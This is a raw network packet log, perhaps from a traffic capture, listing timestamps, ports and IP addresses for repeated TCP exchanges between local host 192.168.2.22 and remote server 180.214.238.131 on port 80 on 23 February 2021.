Feb 23, 2021 11:34:28.976989031 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976989985 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977027893 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977041960 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977070093 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977082968 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977109909 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977117062 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977159977 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977159977 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977205038 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977210045 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977255106 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977267981 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977298021 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977302074 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977338076 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977365017 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977371931 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977377892 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977380991 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977432013 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977452040 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977494001 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977530003 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977571011 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977592945 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977598906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977602005 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977610111 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977648973 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977653980 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977660894 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977699041 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977757931 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977802992 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977809906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977843046 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977849007 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977885008 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977888107 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.977926016 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977963924 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.977993965 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.978001118 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.978005886 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.978915930 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.978957891 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.978976011 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.979000092 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.979073048 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.979113102 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.979149103 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.979161978 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.981476068 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.981522083 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.981544971 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.981570959 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.981856108 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.981898069 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.981913090 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.981940985 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.981946945 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.981981993 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.981992006 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982031107 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982033014 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982079983 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982084990 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982120991 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982129097 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982168913 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982182980 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982223988 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982237101 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982264996 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982271910 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982312918 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982356071 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982399940 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982414007 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982444048 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982448101 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982485056 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982498884 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982528925 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982532978 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982570887 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982577085 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982621908 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982623100 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982666969 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982669115 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982707977 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982713938 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982752085 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982764959 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982794046 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982800961 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982834101 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982841015 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982876062 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982883930 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982919931 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.982927084 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982969046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.982973099 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983020067 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983022928 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983061075 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983067989 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983103037 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983118057 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983143091 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983156919 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983182907 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983190060 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983222961 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983230114 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983263016 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983270884 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983310938 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983311892 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983356953 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983361006 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983396053 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983409882 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983438969 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983443975 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983479023 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983486891 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983519077 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983530998 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983558893 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983566046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983598948 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983630896 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983647108 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983680964 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983685970 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983691931 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983732939 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983738899 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983772993 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983779907 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983814001 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983820915 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983853102 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983860016 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983894110 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983911991 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983933926 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.983963966 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983977079 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.983983040 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984028101 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984033108 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984066963 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984075069 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984107971 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984117031 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984148979 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984163046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984189034 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984196901 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984230995 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984257936 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984266996 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984272003 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984321117 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984323025 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984364986 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984366894 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984414101 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984437943 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984461069 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984474897 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984502077 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984534025 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984538078 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984540939 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984580994 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984582901 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984621048 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984622955 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984664917 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984669924 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984714031 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984744072 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984774113 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984813929 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984833002 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984848976 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984853983 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984854937 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984894991 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984899044 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984954119 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.984956980 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984996080 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.984996080 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985038042 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985042095 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985076904 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985079050 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985120058 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985121012 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985162973 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985167027 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985207081 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985210896 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985255957 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985256910 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985299110 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985302925 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985340118 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985342026 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985380888 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985399961 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985441923 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985452890 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985492945 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985496044 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985536098 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985537052 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985577106 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985579014 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985620022 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985626936 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985670090 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985682964 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985711098 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985713959 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985752106 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985755920 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985794067 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985795975 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985833883 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985840082 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985876083 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985877037 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985920906 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.985920906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985968113 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.985971928 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986017942 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986018896 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986061096 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986062050 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986104012 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986105919 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986146927 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986149073 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986188889 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986222982 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986229897 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986232042 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986277103 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.986277103 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.986326933 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.990279913 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.195756912 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.195816040 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.195859909 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.195899963 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.195941925 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.195985079 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196022034 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196042061 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196074963 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196089029 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196113110 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196130037 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196161985 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196171045 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196196079 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196212053 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196227074 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196254015 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196257114 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196295977 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196329117 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196337938 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196346045 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196388006 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196398973 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196434021 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196451902 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196475029 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196476936 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196521044 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196538925 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196561098 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196588039 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196602106 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196603060 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196644068 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196661949 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196685076 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196713924 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196726084 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196736097 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196783066 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196799040 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196825981 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196863890 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196866035 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196891069 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196908951 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196945906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196949005 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.196979046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.196990013 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.197010040 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.197029114 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.197032928 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.197083950 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.197103024 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.197127104 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.197144985 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.197175026 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199228048 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199285984 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199327946 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199328899 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199357986 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199371099 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199388027 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199412107 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199444056 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199453115 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199455976 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199497938 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199517965 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199548960 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199575901 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199594021 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199609995 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199635983 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199654102 CET	49166	80	192.168.2.22	180.214.238.131
